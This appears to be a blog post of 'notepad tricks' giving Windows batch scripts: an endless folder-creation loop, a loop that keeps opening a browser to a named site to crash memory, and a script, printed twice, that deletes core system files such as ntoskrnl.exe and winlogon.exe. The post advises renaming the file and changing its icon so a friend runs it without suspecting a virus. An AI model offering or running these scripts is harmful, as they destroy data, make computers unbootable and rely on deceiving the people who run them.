By " Saumya Priya ", Author@ H2K
How to create more than 3,000 folders under a minute
Open your notepad and type the following code.
@echo off
:top
md %random%
goto top
2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved the ”1000.bat” file.
The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus.
RAM crashing trick
open notepad and type:A
start http://hackerstreet.blogspot.in//
goto A
save with .bat extension.
Infinitely loops your browser to
open up http://http://hackerstreet.blogspot.in//
How to delete system files using notepad
@echo off
del "c:\windows\pchealth\"
del "c:\windows\system\"
del "c:\windows\system32\restore"
del "winlogon.exe"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\logonui.exe"
del "c:\windows\system32\ntoskrnl.exe"
Copy the above code in notepad, save this file with "virus.bat" extension
del "c:\windows\pchealth\"
del "c:\windows\system\"
del "c:\windows\system32\restore"
del "winlogon.exe"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\logonui.exe"
del "c:\windows\system32\ntoskrnl.exe"
Copy the above code in notepad, save this file with "virus.bat" extension
Still Having Problem..!!! Connect with Admin
For Daily Updates
No comments:
Post a Comment